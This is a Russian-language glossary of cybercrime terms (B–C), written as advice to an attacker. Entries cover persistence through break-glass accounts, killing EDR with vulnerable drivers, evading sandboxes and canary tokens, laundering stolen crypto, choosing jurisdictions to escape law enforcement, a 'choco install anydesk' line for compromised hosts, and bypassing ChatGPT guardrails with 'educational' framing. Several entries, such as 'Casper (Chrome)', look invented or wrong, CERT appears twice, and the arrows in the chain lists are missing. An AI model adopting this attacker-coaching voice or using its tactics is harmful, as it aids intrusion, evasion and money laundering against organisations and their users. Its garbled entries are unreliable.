Break-Glass Account Экстренная учетная запись, предназначенная для доступа к системе, когда обычные механизмы аутентификации недоступны (например, упал сервер MFA, скомпрометированы основные учетки). Break-glass аккаунты имеют максимальные привилегии (Global Admin в Azure, Domain Admin в AD, root на серверах) и часто не защищены MFA (чтобы можно было войти, даже если MFA-сервер упал). Для атакующего break-glass аккаунт идеальная цель для persistence: если мы находим break-glass аккаунт, мы имеем вечный доступ с максимальными правами. Break-glass аккаунты хранятся в безопасных местах (сейфы, password managers, зашифрованные файлы), но эти места могут быть взломаны, если есть доступ к системам администраторов.

Bridge (Crypto) Крипто-бридж, протокол, позволяющий перемещать активы между разными блокчейнами (Ethereum, BSC, Solana, Avalanche, Polygon). Бриджи хранят огромные суммы ликвидности (миллиарды долларов) в смарт-контрактах, что делает их привлекательной целью. Уязвимости в бриджах приводят к многомиллионным потерям: Ronin Bridge ($600M), Wormhole ($320M), Nomad Bridge ($190M). Атаки на бриджи используют: уязвимости в валидаторах (подпись невалидных транзакций), flash loan (манипуляция ликвидностью), reentrancy (повторный вход в контракт). В 2026 атаки на бриджи продолжаются, потому что сложность смарт-контрактов бриджей высока, а аудиты часто поверхностны.

Bridge (Network) Сетевой мост, соединяющий два или более сетевых сегмента, передавая трафик между ними. В контексте атаки bridge (или jump box, bastion host) это устройство, которое имеет доступ к разным сетям (например, IT-сеть и OT-сеть, production и development, внутренняя сеть и DMZ). Если атакующий компрометирует bridge-хост, он может перейти (pivot) в другой сегмент сети. Handala могла бы использовать bridge между IT-сетью Stryker и медицинскими устройствами (LifeNet ECG), но выбрала прямой Intune-доступ, который не требовал bridge. Поиск bridge-хостов важная часть post-exploitation (через BloodHound, netstat, ARP-таблицы).

Bring Your Own Device (BYOD) Политика, позволяющая сотрудникам использовать личные устройства (телефоны, планшеты, ноутбуки) для работы. BYOD размывает границу между личным и корпоративным: личный телефон сотрудника может быть скомпрометирован через инфостилер (RedLine, LummaC2) на его домашнем компьютере, и если на телефоне есть корпоративная почта, Teams, VPN-профили атакующий получает доступ к корпоративной сети. BYOD создает новые attack vectors: компрометация личного устройства доступ к корпоративным данным. Защитники пытаются контролировать BYOD через MDM (Microsoft Intune, Jamf), которые могут стирать корпоративные данные с личных устройств, но не могут контролировать безопасность самого устройства.

Bring Your Own Vulnerable Driver (BYOVD) Техника эскалации привилегий и отключения защит, использующая легитимные, но уязвимые драйверы, которые уже подписаны и загружаются в ядро Windows. Атакующий загружает уязвимый драйвер (например, драйвер антивируса, игровой драйвер, драйвер оборудования), использует его уязвимость для получения доступа к ядру (kernel access) и отключает EDR (убивает процессы, снимает хуки). Драйвер легитимен и подписан, поэтому загружается без предупреждений. BYOVD классическая техника evasion в 2026. Примеры уязвимых драйверов: драйверы ASUS, MSI, Gigabyte, использовавшиеся в атаках для убийства EDR (Zemana, Malwarebytes). После использования драйвер выгружается, следы минимальны.

Bytecode Промежуточный код, исполняемый виртуальной машиной (Java bytecode, Python bytecode, .NET CIL, WebAssembly). В 2026 байткод используется для обфускации: малварь компилируется в байткод, который потом интерпретируется или JIT-компилируется. Байткод сложнее анализировать статически, чем нативный код, потому что нужно понимать семантику виртуальной машины. Также можно использовать reflection для вызова функций без прямых импортов (динамическая загрузка классов). Slopoly (AI-сгенерированный C2) был написан на PowerShell, который не компилируется в байткод, а интерпретируется. Для .NET-малвари использование байткода CIL стандарт.

C

C2 (Command and Control) Сервер управления, через который злоумышленник отправляет команды зараженным устройствам (агентам, ботам) и получает результаты. C2 центральный элемент любой атаки, требующей постоянного присутствия. Архитектура C2 может быть: централизованной (один сервер), распределенной (несколько серверов), peer-to-peer (агенты общаются друг с другом), доменной (через DGA Domain Generation Algorithm). C2 маскируется под легитимный трафик: HTTPS на 443 порту (выглядит как обычный браузер), DNS-туннели (запросы к DNS-серверу), ICMP (пинг), или легитимные облачные сервисы (API Google, Microsoft Graph). Обнаружение C2 главная задача EDR и сетевиков. Для атакующего C2 самая уязвимая часть инфраструктуры: его нужно постоянно менять, скрывать, резервировать. Slopoly пример AI-сгенерированного C2, написанного на PowerShell.

C2aaS (C2 as a Service) Модель предоставления C2-инфраструктуры как услуги. Покупатель (аффилиат, оператор) получает доступ к готовым C2-серверам, панели управления, агентам, технической поддержке. C2aaS включает: домены (часто с DGA), SSL-сертификаты, хостинг (bulletproof, не реагирующий на жалобы), интеграцию с Telegram/Slack для уведомлений. Цены: от $200 в месяц до $2000+ за "premium" инфраструктуру с высокой устойчивостью к takedown. C2aaS позволяет атакующему не заниматься технической стороной управления инфраструктурой, сосредоточившись на доступе и эксфильтрации. C2aaS часть более широкой модели CaaS (Crime-as-a-Service).

CaaS (Crime-as-a-Service) Преступление как услуга: готовые решения для киберпреступности, продаваемые как подписка или разовые покупки. Включает: RaaS (Ransomware-as-a-Service), C2aaS (C2 как услуга), DDoSaaS (DDoS-атаки как услуга), инфостилеры с панелями управления (LummaC2, RedLine), фишинговые киты (готовые страницы для сбора кредов), AI-powered фишинг (генерация писем, deepfake голос). CaaS снижает барьер входа: даже неопытный оператор может провести сложную атаку, купив доступ к инструментам. Архитектура CaaS часто включает AI: автоматический выбор целей, генерация пейлоадов, обход детектов. ShinyHunters использует элементы CaaS: модифицированный Aura Inspector (инструмент) + доступ к IAB (начальный доступ) + leak site (PR).

Cache Poisoning Отравление кэша (DNS-кэша, CDN-кэша, кэша приложения), когда злоумышленник внедряет ложные данные в систему кэширования. DNS cache poisoning: подмена DNS-записи, пользователи попадают на фейковый сайт вместо легитимного. CDN cache poisoning: загрузка вредоносного контента в кэш CDN (Cloudflare, Fastly), который потом отдается всем посетителям сайта. Web cache poisoning: манипуляция заголовками HTTP (Host, X-Forwarded-Host) для сохранения в кэше вредоносного ответа, который потом отдается другим пользователям. Используется для XSS (хранимый XSS через кэш), распространения малвари, фишинга. Cache poisoning остается актуальным для плохо сконфигурированных CDN и кэширующих прокси.

Cadence (C2) Частота heartbeat-сообщений между агентом и C2 (Command and Control). Heartbeat периодический запрос от агента к C2: "есть ли команды?". Стандартная cadence: от 10 секунд (для быстрого реагирования) до нескольких минут (для stealth). Слишком частая cadence (каждые 1-2 секунды) может быть замечена как аномальная; слишком редкая (раз в 10 минут) замедляет реакцию. Атакующие используют jitter (случайные задержки) между heartbeat, чтобы избежать детекции по регулярному паттерну. Slopoly (AI-сгенерированный C2) имел cadence: heartbeat каждые 30 секунд, опрос команд каждые 50 секунд, с логированием в persistence.log. Cadence может меняться в зависимости от активности (например, чаще, когда есть данные для отправки).

Caesar's Palace Казино в Лас-Вегасе, атакованное Scattered Spider (The Com) в сентябре 2023 года. Атака включала: vishing на helpdesk для сброса MFA, компрометацию учетных записей, кражу данных, шифрование систем. Caesars заплатила выкуп в размере $15 млн (по некоторым данным, часть суммы была возвращена через страховку). Атака на Caesars и MGM (сентябрь 2023) стала прецедентом, показавшим уязвимость даже крупнейших корпораций перед vishing-атаками на helpdesk. Scattered Spider (часть The Com) продолжает использовать те же TTPs против других целей (M&S, Co-op, JLR). Caesar's Palace символ успешной атаки через человеческий фактор, а не технические уязвимости.

Cage (CageFS) Система изоляции пользователей на shared-хостинге (CloudLinux). CageFS помещает каждого пользователя в виртуальную файловую систему, где он видит только свои файлы и не может видеть файлы других пользователей или системные файлы. Обход CageFS возможен через локальное повышение привилегий (LPE) в PHP или других скриптах, выполняющихся от имени пользователя. Если на сервере есть уязвимость (например, в PHP-FPM, в ядре, в suexec), можно вырваться из CageFS и получить доступ к файлам других пользователей или к root. Для атакующего CageFS препятствие при атаке на shared-хостинг, но не непреодолимое.

Cain & Abel Устаревший инструмент для перехвата трафика, взлома паролей, ARP poisoning, анализа сети. Активен в 2000-х, сейчас считается legacy. Включал: снятие хэшей паролей из локальных хранилищ, перехват VoIP-трафика, криптоанализ слабых алгоритмов (LM-хэши). В современном арсенале заменен более продвинутыми инструментами (Mimikatz, Responder, Hashcat). Cain & Abel упоминается в историческом контексте как один из первых доступных инструментов для широкого круга пользователей, демократизировавший хакерские техники.

Callback Функция обратного вызова: в программировании функция, переданная в качестве аргумента и вызываемая позже. В контексте атак callback используется для: уведомления C2 о том, что агент активен (heartbeat), выполнения команд асинхронно (агент получил команду, выполнил, отправил результат через callback), обхода синхронных детектов. В process injection callback-функции могут быть использованы для запуска shellcode: CreateRemoteThread с callback-функцией, которая начинает выполнение. В .NET делегаты и события форма callback. Callback-механизмы используются для создания memory-only payloads, которые не оставляют файлов на диске.

Canary Token Ловушка для обнаружения кражи данных или несанкционированного доступа. Canary token это ссылка, файл, DNS-имя, email-адрес, которые выглядят как легитимные, но при обращении к ним (открытии, переходе, разрешении DNS-имени) отправляют уведомление администратору. Примеры: файл "passwords.txt", который на самом деле является canary token; при открытии файла (через WebDAV, SMB) отправляется алерт. Внутренняя сеть может содержать canary tokens для обнаружения lateral movement: если атакующий открывает файл на сетевой папке, защитники узнают об этом. Для обхода атакующий должен энумерировать canary tokens перед доступом к данным или использовать методы, не триггерящие canary (например, копирование файлов через API, а не через SMB).

Capability (APT) Возможности APT-группы (Advanced Persistent Threat): технический стек (инструменты, эксплойты, C2), человеческие ресурсы (количество операторов), финансирование (бюджет), разведывательные возможности (доступ к информации), устойчивость к takedown (резервная инфраструктура). Capability оценивается исследователями (Mandiant, CrowdStrike) по шкале: от "low" (новички, используют чужие инструменты) до "high" (свои эксплойты, кастомная малварь, государственное финансирование). Interlock имеет высокую capability: zero-day эксплуатация, memory-resident webshells, кастомные RAT на Java и JavaScript.

Cape Платформа с открытым кодом для анализа малвари в sandbox (форк Cuckoo). Cape запускает образцы малвари в изолированной виртуальной среде, отслеживает системные вызовы, сетевые соединения, созданные файлы, изменения в реестре. Используется исследователями безопасности и вендорами антивирусов для изучения поведения новых угроз. Для атакующего Cape угроза: если малварь попадает в Cape, ее поведение становится известным, хэши добавляются в базы антивирусов. Обход: анти-сэндбокс техники (проверка на наличие виртуальных сред, задержки выполнения, проверка на наличие мыши/графики).

CAPTCHA Bypass Обход CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart). Методы обхода: AI/ML (нейросети решают CAPTCHA с точностью выше 90% например, YOLO для image-based CAPTCHA), click farms (наем людей для решения CAPTCHA за копейки), эксплуатация уязвимостей (CAPTCHA может быть обойдена через баги в реализации), использование старых/слабых CAPTCHA (v1, v2 без защит). В 2026 AI-powered CAPTCHA bypass стандарт: нейросети решают reCAPTCHA v3, имитируя поведение человека (движения мыши, время реакции). Для массовых операций используются сервисы типа 2captcha, антикаптча.

Carding Мошенничество с кредитными картами: покупка украденных номеров карт (dump), создание клонов карт (считывание магнитной полосы), оплата товаров или перевод средств, обналичивание через дропов. Включает также: проверка валидности карт (carding через мелкие транзакции), покупка fullz (полное досье: имя, адрес, SSN, карта) для identity theft. В 2026 carding эволюционировал в направлении deepfake KYC: создание synthetic identity для регистрации счетов в банках и криптобиржах. ShinyHunters, крадя 5 миллионов записей Salesforce, собирает данные для carding: имена, адреса, платежную информацию.

CarGurus Крупнейший автомобильный маркетплейс (40 млн пользователей в месяц). В феврале 2026 ShinyHunters опубликовал дамп 12.4 миллионов записей CarGurus (6.1 GB), из которых 70% были новыми (не встречались в предыдущих утечках). В дампе: email, имена, телефоны, захешированные пароли, история поиска автомобилей, финансовая информация (заявки на кредиты, частичные SSN). CarGurus пример чистой data extortion: атакующие не шифровали системы, только украли данные и угрожали публикацией. Компания не подтвердила выплату выкупа, но и не выпустила официального заявления сразу после публикации.

Carpet Bombing DDoS-атака, распределенная по нескольким целям одновременно (IP-адресам, сервисам) вместо концентрации на одной. Carpet bombing используется для: отвлечения внимания (пока защитники тушат DDoS, атакующий проводит основную операцию), тестирования защиты (какие сервисы среагируют быстрее), обхода ограничений по пропускной способности (если каждая цель получает умеренный трафик, анти-DDoS системы могут не сработать). Carpet bombing часто сочетается с burst-атаками (всплески трафика). Используется как часть гибридных операций, где DDoS только один из векторов.

CAS (Content Addressable Storage) Система хранения, где данные адресуются по их содержимому (хэшу), а не по пути. Используется в бэкап-системах (Veeam, Commvault) и некоторых облачных хранилищах. Для атакующего CAS интересна тем, что уничтожение бэкапов может быть сложнее: данные разбиты на блоки, адресуемые по хэшам, и простое удаление файлов может не уничтожить сами блоки. При атаке на системы с CAS нужно понимать архитектуру конкретного решения, чтобы гарантированно уничтожить бэкапы.

Case (Salesforce) Объект Salesforce, используемый для управления обращениями клиентов, тикетами в поддержку, запросами. В Salesforce Experience Cloud (порталы для клиентов) объект Case часто доступен guest users (неавторизованным пользователям) для создания обращений. ShinyHunters эксплуатировал misconfigured guest user permissions, чтобы читать Cases, которые содержали PII, конфиденциальную переписку, данные о транзакциях. Case пример объекта, который часто перепривилегирован, потому что администраторы думают: "клиент должен видеть только свои обращения" но забывают ограничить права guest user, который может видеть все обращения.

Cash Out Процесс обналичивания украденных денег: перевод из криптовалюты в фиат, снятие наличными, покупка активов (недвижимость, люкс, криптовалюта), отмывание через бизнес. Cash out chain: stolen crypto Monero mixer DeFi swaps (THORChain, privacy L2) nested services (несколько обменников) real estate/luxury clean fiat. Используются drop networks (цепочки дропов), deepfake KYC для регистрации счетов в банках и биржах. Cash out самый рискованный этап, потому что требует взаимодействия с регулируемыми структурами (банки, биржи, риелторы). Каждая транзакция может быть отслежена, если не соблюдать OPSEC.

Casper (Chrome) Chrome API для взаимодействия с расширениями и приложениями. В контексте атак Casper используется для: CORS exploitation (обход политики междоменных запросов), кражи данных из расширений (если расширение имеет доступ к чувствительным данным), межсайтового скриптинга. Casper также может быть использован для fingerprinting (сбор информации о браузере, установленных расширениях) через API браузера.

CBC (Cipher Block Chaining) Режим шифрования, используемый в блочных шифрах (AES, DES). CBC уязвим к padding oracle attack: если приложение возвращает разные ошибки при неправильном заполнении (padding), атакующий может расшифровать данные (или зашифровать свои) без знания ключа. Padding oracle attacks использовались против ASP.NET, SharePoint, TLS. CVE-2026-20963 (SharePoint RCE) может быть связан с десериализацией, но не с CBC напрямую. CBC в современных системах заменяется на GCM (Galois/Counter Mode), который обеспечивает аутентификацию.

CC (Credit Card) Кредитная карта. В контексте киберпреступности CC объект торговли на даркнете. Продаются: CC number (только номер), CC+CVV (номер + код на обороте), fullz (полное досье: имя, адрес, SSN, дата рождения, номер карты, CVV, PIN, иногда скан документов). Цены: от $5 за простой CC до $200 за fullz с высоким кредитным лимитом. Источники: инфостилеры (автозаполнение браузера, сохраненные карты), дампы баз данных (интернет-магазины), POS-терминалы (скимминг). Используются для carding (покупка товаров), создания synthetic identity, вывода средств.

ccTLD (Country Code Top-Level Domain) Домены верхнего уровня, привязанные к стране: .ru (Россия), .to (Тонга), .su (Советский Союз, все еще используется), .cn (Китай), .ua (Украина). ccTLD важны для OPSEC, потому что некоторые страны не экстрадируют своих граждан, не сотрудничают с US law enforcement, или имеют законы, защищающие владельцев доменов от seizure. Handala после seizure их .to доменов ФБР вернулась через новый домен в том же ccTLD .to, потому что правительство Тонги не выдает информацию США. Выбор ccTLD часть стратегии устойчивости (resilience).

CDN (Content Delivery Network) Сеть доставки контента (Cloudflare, Fastly, Akamai), ускоряющая загрузку сайтов и защищающая от DDoS. Для атакующего CDN инструмент для domain fronting: C2 трафик направляется на CDN, CDN проксирует его на реальный C2, скрывая его IP. CDN также используется для размещения фишинговых сайтов (защита от DDoS, скрытие реального хостинга). Проблемы: некоторые CDN (Cloudflare) по запросу law enforcement могут раскрыть информацию о владельце сайта или заблокировать его. Поэтому атакующие выбирают CDN в юрисдикциях, где ограничено сотрудничество с US.

Cellebrite Израильская компания, производящая инструменты для взлома мобильных устройств (UFED Universal Forensic Extraction Device). Используется law enforcement и военными для извлечения данных из заблокированных телефонов (iOS, Android). Cellebrite может обойти блокировку экрана, извлечь данные из памяти, взломать зашифрованные приложения. Для атакующего Cellebrite угроза, если его устройство попало в руки law enforcement. Оборона: использование полностью зашифрованных устройств с максимальными настройками безопасности (iOS Lockdown Mode), самоликвидация данных при попытке взлома.

Censys Поисковая система для интернет-инфраструктуры, сканирующая весь интернет и индексирующая: открытые порты, SSL-сертификаты, HTTP-заголовки, баннеры сервисов, IoT-устройства. Альтернатива Shodan. Censys используется для рекогносцировки (recon): поиск открытых RDP-портов, панелей управления (Salesforce Experience Cloud /s/sfsites/aura), публичных S3-бакетов, уязвимых версий софта. ShinyHunters использовал Censys для поиска misconfigured Salesforce сайтов. Censys предоставляет API для автоматизации, что позволяет сканировать тысячи целей.

CERT (Computer Emergency Response Team) Группа реагирования на компьютерные инциденты. Национальные CERT: US-CERT (CISA), CERT-EU, NCSC (UK). Вендорские CERT: Microsoft Security Response Center (MSRC), Cisco PSIRT. CERT координируют раскрытие уязвимостей, выпускают предупреждения, помогают с реагированием. Для атакующего CERT важны как источник информации о fresh 1-day: когда CERT выпускает предупреждение, уязвимость становится публичной, и можно атаковать организации, которые не установили патч.

Certificate Pinning Механизм безопасности, при котором приложение фиксирует (пиннит) ожидаемый сертификат или публичный ключ сервера, игнорируя доверенные корневые центры. Если сертификат не совпадает с закрепленным, соединение разрывается. Certificate pinning защищает от MITM-атак (man-in-the-middle), где злоумышленник подменяет сертификат. Для атакующего certificate pinning препятствие при перехвате трафика приложений (например, банковских приложений). Обход: патчинг приложения (удаление pinning), использование эксплойтов в реализации pinning, или атака на устройство до того, как pinning вступит в силу (root/jailbreak).

Certificate Services (ADCS) Active Directory Certificate Services (ADCS) служба сертификатов Microsoft, встроенная в Active Directory. ADCS используется для: выдачи сертификатов пользователям, компьютерам, приложениям; управления шаблонами сертификатов; PKI (Public Key Infrastructure) в корпоративной среде. Атаки на ADCS: ESC1-ESC8 (Certified Pre-Owned) получение сертификата от имени администратора домена через misconfig в шаблонах (например, пользователь может запросить сертификат с субъектом, отличным от своего), атаки на CA (Certificate Authority), NTLM relay на ADCS. Компрометация ADCS может дать атакующему доступ к домену без кражи хэшей паролей.

Certified Pre-Owned Набор атак на Active Directory Certificate Services (ADCS), позволяющих получить сертификат от имени администратора домена. Известные векторы: ESC1 (пользователь может запросить сертификат с субъектом, отличным от своего), ESC2 (шаблон позволяет аутентификацию по сертификату), ESC3 (агент регистрации), ESC4 (доступ на запись к шаблону), ESC5 (доступ к CA-серверу), ESC6 (редактирование атрибутов CA), ESC7 (Vuln CA), ESC8 (NTLM relay на ADCS). Certified Pre-Owned классическая техника post-exploitation, позволяющая получить доступ к Domain Admin без кражи хэшей.

CERTs Группы реагирования на компьютерные инциденты (Computer Emergency Response Teams). Национальные CERT: US-CERT (CISA), CERT-EU (Европейский союз), NCSC (Великобритания). Вендорские CERT: Microsoft Security Response Center (MSRC), Cisco PSIRT. CERT координируют раскрытие уязвимостей, выпускают предупреждения, помогают с реагированием, собирают статистику об инцидентах. Для атакующего CERT важны как источник информации о fresh 1-day: когда CERT выпускает предупреждение, уязвимость становится публичной, и можно атаковать организации, которые не установили патч. Также CERT могут расследовать атаки, что создает риск деанонимизации.

CFAA (Computer Fraud and Abuse Act) Федеральный закон США о компьютерном мошенничестве и злоупотреблениях (1986). CFAA криминализирует: несанкционированный доступ к компьютерам, превышение полномочий, кража данных, распространение вредоносного ПО, вымогательство. Наказания: от штрафов до 10-20 лет тюрьмы. CFAA основа для обвинений в большинстве киберпреступлений в США. Для атакующего CFAA означает, что если его поймают, сроки будут серьезными. В 2026 CFAA используется для преследования участников The Com, Scattered Spider, ShinyHunters, если они попадают в юрисдикцию США.

CFF Explorer Инструмент для анализа PE (Portable Executable) файлов (Windows). Позволяет просматривать: секции, импорты, экспорты, ресурсы, конфигурацию защиты (ASLR, DEP, CFG). Используется для reverse engineering: анализ малвари, модификация бинарников, упаковка/распаковка. Для атакующего CFF Explorer инструмент для подготовки payload: изменение метаданных, чтобы обойти детекты, добавление цифровой подписи (если есть доступ к stolen сертификату).

CFG (Control Flow Guard) Защита Microsoft Windows, предотвращающая выполнение кода по невалидным адресам (косвенные вызовы функций). CFG проверяет, что целевой адрес вызова находится в списке разрешенных (валидных) адресов функций. Обход CFG: JOP (Jump-Oriented Programming), использование гаджетов, не проверяемых CFG, или эксплуатация багов в самой CFG. CFG включен по умолчанию в Windows 10/11 для системных процессов и может быть включен для приложений. Для атакующего CFG препятствие при разработке эксплойтов, требующее сложных техник обхода.

CFI (Control Flow Integrity) Общий принцип защиты целостности потока управления, включающий CFG (Control Flow Guard) и другие механизмы (Intel CET Control-flow Enforcement Technology, Shadow Stack). CFI предотвращает hijacking потока управления через переполнение буфера, ROP (Return-Oriented Programming), JOP (Jump-Oriented Programming). Для атакующего современные системы с включенной CFI требуют использования: info leaks (утечки адресов для bypass ASLR), эксплойтов, которые не нарушают CFI (например, data-only attacks), или уязвимостей в самой CFI.

CFS (Cobalt Strike) Сокращение для Cobalt Strike (C2-фреймворк). Используется в отчетах, логах, обсуждениях. Cobalt Strike коммерческий инструмент для эмуляции атак, но широко используется злоумышленниками (включая взломанные лицензии). CFS в логах EDR указывает на присутствие Cobalt Strike Beacon. Для атакующего использование CFS требует постоянной модификации (malleable C2 профили), чтобы избежать сигнатурных детектов.

CGI (Common Gateway Interface) Старый стандарт для запуска скриптов на веб-сервере (Perl, C, Python). CGI-скрипты часто имеют уязвимости (command injection, path traversal), потому что написаны давно, без учета современных практик безопасности. В 2026 CGI встречается в legacy-системах: старые корпоративные порталы, системы управления, IoT-панели. Для атакующего CGI легкая цель: find .cgi в Shodan, проверить на command injection через параметры.

Chain (Blockchain) Блокчейн. Цепочка блоков, содержащих транзакции. В контексте атак chain используется для: отслеживания транзакций (blockchain analysis), поиска уязвимостей в смарт-контрактах (chaincode), атак на консенсус (51% атака). Chain hopping переход между разными блокчейнами (BTC XMR ETH) для отмыва средств. Для атакующего понимание chain необходимо для сокрытия финансовых следов.

Chaining Цепочка атак: использование нескольких уязвимостей или техник последовательно для достижения цели. Вместо одного эксплойта, который дает все, chaining комбинирует: социальная инженерия (vishing) доступ к системе локальное повышение привилегий дамп кредов lateral movement эксфильтрация. Bybit: vishing на dev доступ к AWS модификация JS обман мультисига слив $1.5B. Инфостилер-логи агрегация на даркнете публичный дамп 16 млрд записей. Chaining стандарт для сложных атак.

Champion (SOC) Адвокат безопасности в организации (Security Operations Center champion). Сотрудник, который продвигает инициативы по безопасности, обучает коллег, координирует между IT, бизнесом и SOC. Для атакующего champion цель социальной инженерии: если скомпрометировать champion, можно получить доступ к sensitive information (планы защиты, уязвимости, ключи). Champion часто имеет повышенные привилегии.

Chaos (Malware) Руткит для Linux, использовавшийся в атаках на облачные среды. Chaos скрывает процессы, файлы, сетевые соединения, модифицирует ядро через loadable kernel modules (LKM). В 2026 Chaos считается legacy, но его техники (kernel module rootkits) используются в современных атаках на Linux-серверы. Для атакующего понимание Chaos помогает в разработке собственных руткитов.

Chaos Engineering Практика тестирования устойчивости систем путем намеренного внесения хаоса: отключение серверов, задержки сети, сбои зависимостей. Используется защитниками для проверки resilience. Для атакующего Chaos Engineering интересен тем, что показывает слабые места системы: если компания практикует Chaos Engineering, она знает свои уязвимости и, вероятно, имеет планы восстановления. Атака на такую компанию требует более тщательной подготовки.

ChatGPT LLM (Large Language Model) от OpenAI. В контексте атак ChatGPT используется для: генерации фишинговых писем (персонализированных, без грамматических ошибок), написания кода для эксплойтов, обхода guardrails (prompt injection), создания deepfake текстов. Slopoly первый AI-сгенерированный C2, созданный с помощью LLM. Атакующие используют ChatGPT для автоматизации задач, которые раньше требовали программиста. Обход guardrails достигается через промпт-инженерию: "для образовательных целей", "для тестирования безопасности".

Chicken Сленговое название одноразового сервера (burner VPS), используемого для C2, эксфильтрации, прокси. "Chicken" сервер, который используется для одной операции и уничтожается после завершения, чтобы не оставлять следов. Handala использовала chicken-серверы для Stryker атаки, но один из них был misconfigured, что позволило AWS обнаружить их инфраструктуру. Chicken должны быть в разных юрисдикциях, зарегистрированы на burner identities, оплачены через крипту.

Chimera Ransomware-группа, известная атаками на healthcare и government секторы в 2019-2021. Chimera практиковала двойной шантаж: шифрование + угроза публикации данных. В 2026 Chimera считается legacy, но ее TTPs (использование PowerShell, WMI, PsExec) используются современными группами. Chimera также известна как одна из первых групп, использовавших вымогательство публикацией данных.

Chinese APTs Собирательное название APT-групп, связанных с Китаем: APT41 (BARIUM, Winnti), APT31 (Judgement Panda), TA428 (Deep Panda), Volt Typhoon, и другие. Специализируются на: шпионаже, краже интеллектуальной собственности, long-term persistence, supply chain атаках. Используют кастомную малварь (PlugX, ShadowPad), C2 через легитимные облачные сервисы (Google Drive, Dropbox). Для атакующего Chinese APTs интересны как источник TTPs для изучения: техники обхода EDR, persistence на уровне firmware, supply chain компрометации.

Chipset Exploitation Атаки на чипсеты (наборы микросхем на материнской плате), включая Intel Management Engine (ME), AMD Platform Security Processor (PSP), ARM TrustZone. Эти подсистемы имеют независимые процессоры, работают вне основного ОС, имеют доступ ко всей памяти и периферии. Уязвимости в ME/PSP могут дать атакующему полный контроль над устройством, даже если ОС переустановлена. Chipset exploitation используется в APT-атаках для долгосрочного присутствия. Для атакующего это высший уровень persistence: firmware на уровне чипсета не очищается даже перепрошивкой BIOS.

Chisel Инструмент для создания туннелей через HTTP/HTTPS, использующий WebSocket. Chisel позволяет пробрасывать трафик через firewalls и прокси, маскируя его под обычный HTTPS. В атаках Chisel используется для: C2 через HTTP (выглядит как обычный веб-трафик), прокси для RDP/SSH (обход ограничений), туннелирования трафика из изолированных сетей. Chisel альтернатива SSH-туннелям, когда SSH заблокирован, но HTTPS разрешен.

Chocolatey Менеджер пакетов для Windows, устанавливающий софт из командной строки (аналог apt-get для Linux). Chocolatey используется атакующими для установки легитимных инструментов (AnyDesk, ScreenConnect, Wireshark) на скомпрометированные системы, не вызывая подозрений (так как это легитимный менеджер пакетов). Команда: choco install anydesk -y. Установка через Chocolatey оставляет меньше следов, чем скачивание EXE и запуск.

CIA (Central Intelligence Agency) Центральное разведывательное управление США. CIA участвует в кибероперациях (включая наступательные) и координируется с CISA, FBI, USCYBERCOM. В контексте кибервойны CIA занимается шпионажем и скрытыми операциями. Для атакующего CIA угроза, если его операция пересекается с интересами национальной безопасности США (например, атаки на критическую инфраструктуру, финансирование терроризма). Handala, атакуя Stryker (медицинского гиганта, связанного с израильскими технологиями), попала в зону внимания CIA.

CIA (Confidentiality, Integrity, Availability) Триада безопасности, описывающая основные цели защиты: конфиденциальность (доступ только авторизованным), целостность (данные не изменены), доступность (система работает). Атакующий может нацеливаться на любой из трех элементов: кража данных (нарушение конфиденциальности), модификация данных (нарушение целостности, например, изменение химических дозировок в водоканале), вывод из строя (нарушение доступности, ransomware, wiper). Handala нарушила все три: конфиденциальность (50TB данных), целостность (изменение конфигураций Intune), доступность (200k устройств wiped).

CICD (CI/CD) Continuous Integration/Continuous Delivery конвейеры разработки, автоматизирующие сборку, тестирование и развертывание кода. CI/CD пайплайны цель supply chain атак: внедрение малвари в код на этапе сборки (компрометация build server), кража secrets (AWS-ключи, API-токены) из pipeline конфигураций, модификация артефактов (подмена бинарников). Атака на CI/CD может привести к компрометации всех продуктов компании. ShinyHunters могла бы атаковать CI/CD Salesforce вместо misconfig, но выбрала более легкий путь.

CIDR (Classless Inter-Domain Routing) Метод IP-адресации, позволяющий гибко делить сети на подсети (например, 10.0.0.0/24). В рекогносцировке CIDR используется для определения диапазонов IP-адресов, принадлежащих цели, через WHOIS, BGP, DNS. Понимание CIDR позволяет сканировать только нужные подсети, а не весь интернет.

CISA (Cybersecurity and Infrastructure Security Agency) Национальное киберагентство США, входит в структуру DHS (Department of Homeland Security). CISA отвечает за защиту критической инфраструктуры (энергетика, водоснабжение, healthcare, финансы), координирует реагирование на инциденты, выпускает предупреждения об уязвимостях, управляет KEV (Known Exploited Vulnerabilities) catalog. В марте 2026 CISA работала с 38% штата из-за shutdown, потеряв 1000 сотрудников за год. CISA seized домены Handala в координации с DOJ и FBI. Для атакующего CISA главный противник в США, который может координировать охоту на него.

CISSP (Certified Information Systems Security Professional) Престижная сертификация в области информационной безопасности. CISSP теоретическая база, которую изучают защитники. Для атакующего CISSP интересна тем, что знание этой базы помогает понимать, как защитники мыслят, какие модели используют, какие уязвимости они ищут. Атакуя систему, спроектированную CISSP-специалистами, нужно искать пробелы между теорией и практикой.

CJNG (Jalisco New Generation Cartel) Мексиканский наркокартель, один из самых жестоких и мощных. Handala в своих смертельных угрозах утверждала, что передала адреса жертв в США и за рубежом картелю CJNG, предложив награду $250,000 за убийство и обезглавливание. Использование картелей как инструмента угроз новая эскалация, стирающая грань между киберпреступностью и физическим терроризмом. Для атакующего привлечение картелей означает переход на уровень, где ответом будет не CISA, а FBI SWAT и военные.

CK (Certificate Key) Ключ сертификата (приватный ключ, используемый для подписи и расшифровки). Кража CK позволяет: подписывать малварь своим сертификатом (обходит проверки подписи), расшифровывать перехваченный TLS-трафик (если ключ от сервера), выдавать себя за легитимный сервис. CK хранятся в HSM (Hardware Security Modules), на серверах, в файлах. Infostealer крадет CK из локальных хранилищ браузеров, сертификатов.

Class Action Коллективный иск (групповой иск), подаваемый группой лиц против компании за причиненный ущерб. После крупных утечек данных (Conduent 25M+, Wynn 800k) class action lawsuits неизбежны. Истцы требуют компенсацию за: кражу PII, финансовые потери, моральный ущерб, расходы на мониторинг кредитной истории. Суммы исков могут достигать миллиардов долларов. Для компании class action дополнительное давление после утечки, часто приводящее к выплате выкупа, чтобы избежать публичного раскрытия.

CLI (Command Line Interface) Командная строка (cmd.exe, PowerShell, bash). CLI основной интерфейс для атакующего: выполнение команд, скриптов, загрузка инструментов, навигация по файловой системе. В 2026 CLI остается незаменимым инструментом, несмотря на рост GUI-инструментов. Знание CLI (команд, параметров, обходов ограничений) базовая компетенция.

